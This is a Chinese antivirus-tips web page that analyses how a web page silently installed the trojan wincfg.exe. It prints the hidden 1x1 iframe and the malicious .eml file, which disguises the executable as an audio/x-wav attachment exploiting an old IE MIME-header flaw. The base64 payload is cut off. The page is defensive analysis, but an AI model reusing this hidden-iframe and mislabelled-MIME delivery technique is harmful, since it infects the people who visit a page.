杀毒技巧系列:杀毒、防恶意代码、脚本病毒的不完全合集

• 
  
  　　我们来看看wincfg.exe是如何下载到浏览者计算机上的，在该网页上点击鼠标右键，选择其中的“查看源代码”，在网页代码最后面发现了可疑的一句：
  IFRAME
  src="wincfg.eml" width=1
  height=1
  
  　　注意到其中的“wincfg.eml”了吗？大家都知道eml为邮件格式，网页中要eml文件干什么呢？非常可疑！再次浏览该网页，再看看任务管理器，wincfg.exe进程又回来了，原来问题就在这个文件上！既然问题在这文件上，当然想办法搞到这个文件看看了。用蚂蚁把文件下载下来，鼠标刚点上去，wincfg.exe又被执行了，真是阴魂不散啊！
  
  打开a.eml，发现其内容如下：
  
  From:
  "xxx" To: "xxx" Subject: xxxx
  Date: Tue, 7 Apr 2001 15:16:57
  +800
  MIME-Version: 1.0
  Content-Type:
  multipart/related;
  type="multipart/alternative";
  boundary="1"
  X-Priority:
  3
  X-MSMail-Priority: Normal
  X-Unsent:
  1
  
  --1
  Content-Type:
  multipart/alternative;
  boundary="2"
  
  --2
  Content-Type:
  text/html;
  charset="gb2312"
  Content-Transfer-Encoding:
  quoted-printable
  
  HTML>
  HEAD>
  /HEAD>
  BODY
  bgColor=3D#ffffff>
  iframe src=3Dcid:THE-CID height=3D0
  width=3D0>
  
  /BODY>
  
  
  --2--
  
  --1
  Content-Type:
  audio/x-wav;
  name="wincfg.exe"
  Content-Transfer-Encoding:
  base64
  Content-ID:
  
  TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4
  gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAIh3BDsAAAAAAAAAAOAADwELAQQUAC
  AAAAAQAAAAkAAAIL0AAACgAAAAwAAAAABAAAAQAAAAAgAABAAAAAEAAAAEAAAAAAAAAADQA
  AAAEAAAAAA……(以下删掉一大节)
  
  --1
  
  你看到的类似“TVqQAAMAAAAEAAAA//8AAL”这样的字符，就是wincfg.exe经过base64编码的内容。上面这些代码中，关键的是下面这一段：
  
  Content-Type:
  audio/x-wav;
  name="wincfg.exe"
  Content-Transfer-Encoding:
  base64
  Content-ID:
  
  　　其中，name="wincfg.exe"这一句定义了文件名称，在此为wincfg.exe。
  
  而这一句：Content-Transfer-Encoding:
  base64则定义了代码格式为base64。
  
  　　从这句Content-ID:
  开始才是代码的起步，“TVqQAAMAAAAEAAAA//8AAL”等为wincfg.exe文件的BASE64方式编码，这个以 BASE64方式编码的文件会反编译成wincfg.exe文件并运行。这就是浏览该网页会中木马的原因！到此我就明白了，其实，所谓的浏览网页会中木马，只是网页制作者利用了微软IE浏览器中存在的漏洞进行攻击的一个案例而已，说白了就是利用了错误的MIME头进行攻击。
  
• 上一页 [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16] [17] [18] [19] 下一页 
• 复制本页网址和标题，发送给你QQ/Msn的好友一起分享
  
  
• 杀毒技巧系列:杀毒、防恶意代码、脚本病毒的不完全合集 相关文章：
• ·《拳皇2002》隐藏超杀出招表 - 技巧心得
• ·卡巴斯基6.0key杀毒软件下载
• ·杀手十三-详细攻略 - 游戏攻略
• ·拳皇2002隐杀出招表 - 其他电子游戏秘籍
• ·网吧必杀：如何进入网吧主机
• ·Kvsc3.exe、Kvsc3.dll病毒查杀清除方法
• ·在线杀毒地址大全(各大安全公司)
• ·杀毒技巧系列:杀毒、防恶意代码、脚本病毒的不完全合集
• ·防病毒必务宝典—计算机病毒专杀进程列表
• ·反病毒知识：如何让你的移动硬盘在DOS下杀毒
• 杀毒技巧系列:杀毒、防恶意代码、脚本病毒的不完全合集 相关软件
• ·瑞星杀毒软件 2007 V19.32.12 完全免费版
• ·瑞星杀毒防火墙组合版2007V19.34.32 完全免费版
• ·AV终结者/8749木马专杀工具 V4.6
• ·瑞星杀毒软件 2008 V20.21.22 完全免费版
• ·AV终结者专杀工具V4.5
• ·阿帕奇杀戮战场 V1.0
• ·恐惧杀手:杀出地狱单人版
• ·USBKiller(U盘病毒专杀工具) V2.1 build 正式版 0706
• ·CNNIC中文上网专杀工具 V1.0
• ·恐惧杀手（斩妖除魔）中文版

上一篇:天气采集系统

下一篇:防火墙进化进行时

• 特别声明：本站除部分特别声明禁止转载的专稿外的其他文章可以自由转载，但请务必注明出处和原始作
• 者.文章版权归文章原始作者所有.对于被本站转载文章的个人和网站，我们表示深深的谢意。如果本站转
• 载的文章有版权问题请联系编辑人员,我们尽快予以更正. 转载请注明来源：http://www.hackhome.com

精品推荐

热点TOP10

特别推荐